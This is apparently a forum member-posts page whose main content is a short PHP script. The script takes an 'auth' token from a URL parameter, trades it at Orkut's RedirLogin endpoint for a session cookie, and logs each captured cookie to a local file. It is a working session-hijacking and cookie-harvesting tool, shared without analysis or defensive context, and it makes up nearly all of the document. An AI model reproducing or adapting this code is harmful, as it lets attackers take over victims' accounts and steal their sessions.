LOOOOOOOL!
This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.
Show posts Menu<?
$auth = $_GET[auth];
function curl($url, $header, $nobody, $cookie, $str) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, $header);
curl_setopt($ch, CURLOPT_NOBODY, $nobody);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
$cod = curl_exec($ch); curl_close($ch);
if ($str !== 0) { $cod = explode($str, $cod); }
return $cod;
}
$cookie = curl("http://www.orkut.com/RedirLogin.aspx?auth={$auth}", 1, 1, 0, "Set-Cookie:");
$cookie = $cookie[1];
$fp = fopen("log.txt","a");
fwrite($fp, "$cookie
");
fclose($fp);
?>